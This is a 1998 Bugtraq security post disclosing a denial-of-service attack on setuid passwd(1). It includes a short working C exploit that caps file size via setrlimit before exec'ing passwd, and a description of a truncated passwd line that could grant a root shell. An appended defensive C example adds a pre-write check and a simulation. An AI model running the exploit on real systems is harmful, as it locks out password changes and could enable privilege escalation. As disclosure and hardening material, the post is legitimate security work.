Bugtraq mailing list archives
resource starvation against passwd(1)
From: ant () NOTATLA DEMON CO UK (Antonomasia)
Date: Sun, 22 Feb 1998 17:18:11 GMT
Standard apology if old...

This demonstrates a resource starvation attack on the setuid root passwd(1) program. In the case I tested it was the Red Hat Linux passwd-0.50-7 program without shadowing.

#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;

    /* Cap the size of any file this process may write; the cap is
       inherited by whatever it execs, setuid root or not. */
    rl.rlim_cur = 4000;
    rl.rlim_max = 4000;
    setrlimit(RLIMIT_FSIZE, &rl);

    execl("/usr/bin/passwd", "passwd", (char *) 0);
    perror("execl");
    return 1;
}

The resource being restricted is file size, and if the passwd file is large enough it cannot be written back and the passwd program dies. This leaves the passwd file locked against further password changes - a denial of service attack.

I was unable to write back an incomplete passwd file during my tests, but I can imagine some systems allowing this, in which case you could aim for an incomplete last line like this

    myname:my-epw:

which could be awkward if any authentication programs interpret it as

    myname:my-epw:0:0::/:/bin/sh

A suggested fix is for the passwd program to be aware of the size of the file before writing, and to quit if failure is predicted. There are obviously other resources that could be restricted, and there may be a case for increasing limits on CPU time or file descriptors, or even file size, to ensure successful completion.

--
##############################################################
# Antonomasia   ant () notatla demon co uk                   #
# See http://www.notatla.demon.co.uk/                        #
##############################################################
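The two sides of the post above, as an added example that is not part of the original message or of the Red Hat passwd program: the pre-write check the author suggests (size the rewrite against RLIMIT_FSIZE and refuse before touching the file), the "raise the limit" alternative, and an in-process re-creation of the starved write so the failure mode can be seen without a setuid binary. Function names, the scratch file under /tmp and the 4000/5000-byte figures are the editor's assumptions, chosen to mirror the 4000-byte limit in the post.

```c
/* Added example, not from the original post. RLIMIT_FSIZE is inherited
 * across execve(), so a setuid program starts life with whatever limit
 * its unprivileged caller chose; these helpers show how such a program
 * can detect or undo that before rewriting a critical file. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <unistd.h>

/* Predict whether a fresh file of `needed` bytes fits under the current
 * RLIMIT_FSIZE soft limit. 1 = fits, 0 = the write would be cut short
 * (and the process would get SIGXFSZ), -1 = error. This is the check the
 * post suggests passwd(1) should run before opening the file for writing. */
int fsize_limit_allows(off_t needed)
{
    struct rlimit rl;
    if (needed < 0 || getrlimit(RLIMIT_FSIZE, &rl) != 0)
        return -1;
    if (rl.rlim_cur == RLIM_INFINITY)
        return 1;
    return (rlim_t)needed <= rl.rlim_cur ? 1 : 0;
}

/* Raise the soft limit as far as this process may. A root (or
 * CAP_SYS_RESOURCE) process can lift the hard limit to RLIM_INFINITY;
 * an unprivileged one can only move the soft limit up to the hard one.
 * Returns 0 on success, -1 if neither attempt worked. */
int fsize_limit_raise(void)
{
    struct rlimit rl, want = { RLIM_INFINITY, RLIM_INFINITY };
    if (getrlimit(RLIMIT_FSIZE, &rl) != 0)
        return -1;
    if (setrlimit(RLIMIT_FSIZE, &want) == 0)
        return 0;                   /* privileged: hard limit lifted */
    rl.rlim_cur = rl.rlim_max;      /* unprivileged: soft up to hard */
    return setrlimit(RLIMIT_FSIZE, &rl);
}

/* Run fsize_limit_allows() under a temporarily lowered soft limit, then
 * restore it. Lets the prediction be exercised without changing the
 * caller's limits for good. */
int predict_under_limit(rlim_t limit, off_t needed)
{
    struct rlimit saved, rl;
    if (getrlimit(RLIMIT_FSIZE, &saved) != 0)
        return -1;
    rl = saved;
    rl.rlim_cur = limit;
    if (setrlimit(RLIMIT_FSIZE, &rl) != 0)
        return -1;
    int verdict = fsize_limit_allows(needed);
    setrlimit(RLIMIT_FSIZE, &saved);
    return verdict;
}

/* Re-create the starved write in this process: lower the soft limit to
 * `limit` bytes (the hard limit is left alone so this can be undone), then
 * write `size` bytes of constructed data to a scratch file. SIGXFSZ is
 * ignored so the failing write returns EFBIG instead of killing us, which
 * is what happens to an unprepared setuid program. Returns the number of
 * bytes that actually reached the file, or -1 on setup failure. */
long simulate_starved_write(rlim_t limit, size_t size)
{
    struct rlimit saved, rl;
    if (getrlimit(RLIMIT_FSIZE, &saved) != 0)
        return -1;
    rl = saved;
    rl.rlim_cur = limit;
    if (setrlimit(RLIMIT_FSIZE, &rl) != 0)
        return -1;
    signal(SIGXFSZ, SIG_IGN);

    char path[] = "/tmp/passwd-fsize-demo-XXXXXX";  /* scratch, not /etc/passwd */
    int fd = mkstemp(path);
    if (fd < 0) {
        setrlimit(RLIMIT_FSIZE, &saved);
        return -1;
    }
    unlink(path);

    char *buf = malloc(size);
    memset(buf, 'x', size);                 /* constructed file contents */
    size_t total = 0;
    while (total < size) {
        ssize_t n = write(fd, buf + total, size - total);
        if (n <= 0)                         /* EFBIG: file may not grow further */
            break;
        total += (size_t)n;
    }
    free(buf);
    close(fd);
    setrlimit(RLIMIT_FSIZE, &saved);        /* restore the caller's soft limit */
    return (long)total;
}

int main(void)
{
    printf("prediction for 5000 bytes under a 4000-byte limit: %d\n",
           predict_under_limit(4000, 5000));
    printf("bytes written of 5000 under a 4000-byte limit: %ld\n",
           simulate_starved_write(4000, 5000));
    return 0;
}
```

On Linux the first write under the 4000-byte limit is silently truncated to 4000 bytes and the next one fails with EFBIG (or kills the process with SIGXFSZ if the signal is not ignored), which is exactly the half-written-then-dead state the post describes; a program that calls fsize_limit_allows() with the size of the new file before opening it for writing, and bails out on 0, never gets there.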